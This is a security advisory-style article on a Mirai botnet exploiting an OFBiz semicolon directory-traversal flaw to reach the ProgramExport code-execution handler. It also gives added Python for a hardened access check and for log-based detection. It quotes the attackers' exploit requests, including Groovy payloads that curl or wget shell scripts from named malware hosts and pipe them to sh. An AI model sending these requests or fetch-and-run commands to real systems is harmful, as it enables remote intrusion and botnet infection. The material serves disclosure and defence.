Enterprise resource planning (ERP) software is at the core of many businesses, supporting human resources, accounting, shipping, and manufacturing. These systems can become very complex and difficult to maintain. They are often highly customized, which can make them difficult to patch. Yet critical vulnerabilities continue to affect these systems, putting critical business data at risk.
The SANS Internet Storm Center has published a report indicating that the open source ERP framework OFBiz is currently being targeted by a new type of Mirai botnet.
As part of its broader portfolio of projects, the Apache Foundation supports OFBiz, a Java-based framework for creating Enterprise Resource Planning (ERP) applications. OFBiz has not seen as much adoption as commercial alternatives. However, like any ERP system, organizations rely on OFBiz for sensitive business data, and the security of these ERP systems is extremely important.
In May of this year, a critical security update was released for OFBiz that fixed a directory traversal vulnerability that could lead to remote command execution. Versions of OFBiz prior to 18.12.13 were affected. A few weeks later, details of the vulnerability were made public.
Directory traversal, or path traversal, vulnerabilities can be used to circumvent access control rules. For example, if a user has access to the “/public” directory but not the “/admin” directory, an attacker can use a URL such as “/public/../admin” to circumvent the access control logic. Recently, CISA and the FBI released an alert focused on directory traversal as part of their “Secure by Design” initiative. CISA noted that they currently track 55 directory traversal vulnerabilities as part of their “Known Exploited Vulnerabilities” (KEV) catalog.
In the case of OFBiz, the directory traversal is easily initiated by inserting a semicolon. All an attacker needs to do is find a URL they have access to and append the restricted URL after the semicolon. Currently observed exploit URLs are:
/webtools/control/forgotPassword;/ProgramExport
‘forgotPassword’ does not require authentication because users should be able to reset their passwords without having to log in first. ‘ProgramExport’, on the other hand, should be access controlled and not accessible unless a user is logged in. ‘ProgramExport’ is particularly dangerous in that it allows arbitrary code execution. The flaw in OFBiz’s logic was that it stopped evaluating the URL at the semicolon: the access check only saw ‘forgotPassword’, while the request was still handled by the second part of the URL, ‘/ProgramExport’, so any user who was not logged in could reach it.
An attacker would need to use a POST request to exploit the vulnerability, but a request body is not required; passing the payload as a URL parameter works just as well.
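The following Python is an added illustration of the two access-control bypasses described above (the ‘/public/../admin’ traversal and the semicolon path parameter); it is a simplified model, not OFBiz’s own code. The policy (‘/public’ readable anonymously, ‘forgotPassword’ callable anonymously, everything else login-only), the function names and the sample URLs are all constructed for the example. The naive check evaluates the URL only up to the first semicolon and uses plain prefix matching; the hardened check authorizes the same canonical path the dispatcher will serve.

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Constructed policy for a toy web application (not OFBiz's own code):
# anonymous users may read the /public tree and call the password-reset
# handler; everything else, including /admin and ProgramExport, needs a login.
ANON_TREES = ("/public",)
ANON_EXACT = {"/webtools/control/forgotPassword"}


def naive_anon_allowed(raw_path: str) -> bool:
    """Model of the flawed logic: evaluate the URL only up to the first ';'
    (the start of a servlet path parameter) and trust a plain prefix match.
    Both shortcuts let a request reach a resource the check never saw."""
    path = raw_path.split(";", 1)[0]
    return path in ANON_EXACT or any(path.startswith(t + "/") for t in ANON_TREES)


def canonical_path(raw_url: str) -> str:
    """Reduce a request URL to the path the dispatcher will actually serve:
    drop the query string, percent-decode, strip the ';param' suffix from
    every segment, and collapse '.' and '..' components."""
    path = unquote(urlsplit(raw_url).path)
    segments = [seg.split(";", 1)[0] for seg in path.split("/")]
    return posixpath.normpath("/" + "/".join(s for s in segments if s))


def hardened_anon_allowed(raw_url: str) -> bool:
    """Authorize the canonical path, and match trees as directories
    (prefix plus '/') so '/public' does not also admit '/publicadmin'."""
    path = canonical_path(raw_url)
    if path in ANON_EXACT:
        return True
    return any(path == t or path.startswith(t + "/") for t in ANON_TREES)


if __name__ == "__main__":
    samples = [
        "/public/index.html",                                # legitimate
        "/public/../admin",                                  # traversal from the article
        "/public/%2e%2e/admin",                              # same, percent-encoded
        "/webtools/control/forgotPassword;jsessionid=abc",   # benign path parameter
        "/webtools/control/forgotPassword;/ProgramExport",   # the OFBiz pattern
        "/webtools/control/ProgramExport?groovyProgram=x",   # direct access, denied by both
    ]
    for url in samples:
        print(f"{url:50} naive={naive_anon_allowed(url)!s:5} hardened={hardened_anon_allowed(url)}")
```

The point of the hardened version is that the decision and the dispatch operate on one canonical representation, so a path parameter or an encoded ‘..’ can no longer make the check and the handler disagree about which resource is being requested.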
The SANS Internet Storm Center uses an extensive honeypot network to detect attempts to exploit various web application vulnerabilities. Significant new exploitation attempts are summarized in “First Seen” reports. This weekend, these sensors detected a significant increase in attempts to exploit CVE-2024-32213, the OFBiz directory traversal vulnerability described above, which was quickly picked up in the “First Seen” report.
The exploit attempts originated from two different IP addresses that are also associated with various attempts to exploit IoT devices, and are commonly associated with various flavors of the current “Mirai” botnet.
The criminals used two different exploits. In the first, the command that the exploit was intended to execute was included in the URL itself:
POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl https://95.214.27.196/where/bin.sh
The second used the request body for the command, which is more common for “POST” requests.
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host: (victim IP address)
Accept: */*
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 147

groovyProgram=throw+new+Exception('curl https://185.196.10.231/sh | sh -s ofbiz || wget -O- https://185.196.10.231/sh | sh -s ofbiz'.execute().text);
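For defenders who only have web server access logs, the following Python is an added detection example (not part of the ISC report and not a SANS tool) that flags the request shape used in both exploits. The log lines are constructed in Apache/nginx “combined” format with made-up IPs, timestamps and user agents; only the request paths reproduce the pattern shown above. The rule names and the function names are assumptions for this example.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in Apache/nginx "combined" format. IPs,
# timestamps and most user agents are made up; the request lines reproduce the
# two exploit shapes described above (URL-parameter and request-body variants)
# plus benign traffic that must not alert.
SAMPLE_LOG = """\
203.0.113.10 - - [03/Aug/2024:10:15:01 +0000] "GET /webtools/control/main HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.11 - - [03/Aug/2024:10:15:07 +0000] "POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=throw+new+Exception('id'.execute().text) HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.12 - - [03/Aug/2024:10:15:09 +0000] "POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1" 200 812 "-" "Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0"
203.0.113.13 - - [03/Aug/2024:10:16:00 +0000] "GET /webtools/control/forgotPassword;jsessionid=0A1B2C HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.14 - - [03/Aug/2024:10:16:30 +0000] "POST /webtools/control/forgotPassword%3B/ProgramExport HTTP/1.1" 200 812 "-" "curl/8.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# A new path component that starts after a ';' path parameter: the bypass shape.
PATH_PARAM_TRAVERSAL = re.compile(r";[^/]*/")
# The code-execution handler, reached as the component after the ';'.
SENSITIVE_HANDLER = re.compile(r"/ProgramExport(?:[/;?]|$)")
# Groovy source handed over in the query string. The request-body variant is
# not visible in an access log, so the two path rules above must carry that case.
GROOVY_IN_QUERY = re.compile(r"[?&]groovyProgram=")


def classify(target: str) -> list[str]:
    """Return the names of the rules matched by one request target."""
    decoded = unquote(target)            # %3B -> ';' etc.: compare what the server sees
    path = decoded.split("?", 1)[0]
    hits = []
    if PATH_PARAM_TRAVERSAL.search(path):
        hits.append("path-param-traversal")
        after_param = path.split(";", 1)[1]
        if SENSITIVE_HANDLER.search(after_param):
            hits.append("programexport-via-path-param")
    if GROOVY_IN_QUERY.search(decoded):
        hits.append("groovy-in-query")
    return hits


def scan_log(text: str) -> list[dict]:
    """Parse combined-format lines and return one alert per suspicious request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m["target"])
        if hits:
            alerts.append({"ip": m["ip"], "ts": m["ts"], "method": m["method"],
                           "target": m["target"], "rules": hits})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(f"{alert['ip']:15} {alert['method']:4} {', '.join(alert['rules']):45} {alert['target']}")
```

The benign ‘;jsessionid=’ path parameter does not alert, because the rule keys on a new path component after the semicolon rather than on the semicolon itself. For the request-body exploit the command never reaches the access log, so the second line of defence is egress: an OFBiz application server that suddenly runs curl or wget against an unknown host is the behaviour both payloads above depend on.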
Unfortunately, neither the ‘bin.sh’ nor the ‘sh’ script was recovered. The IP address was also seen scanning on July 29th, using the user agent ‘KrebsOnSecurity’ in honor of infosec blogger Brian Krebs. However, the URLs scanned were primarily parasitic, looking for existing web shells left behind from previous attacks. The IP address was also used to deliver a file called ‘botx.arm’, a filename commonly associated with Mirai variants.
We’ve been waiting for scans exploiting the OFBiz vulnerability since it was announced in May. It is easy to exploit, and while the number of vulnerable and exposed installations is small, that has not deterred attackers so far: they are at least experimenting with it, and it is possible they will add the vulnerability to bots like this Mirai variant.
There are a few IPs involved:
- 95.214.27.196: Sending exploits as URL parameters and hosting malware.
- 83.222.191.62: Sending the exploit in the request body. The malware is hosted on 185.196.10.231. In early July, this IP scanned for IoT vulnerabilities.
- 185.196.10.231: Hosts malware.
If you found this article interesting and would like to dive deeper into the world of securing web applications, APIs, and microservices, you can join me for my course SEC522 at Network Security 2024 (September 4-9). You can find all the content offered at the event here.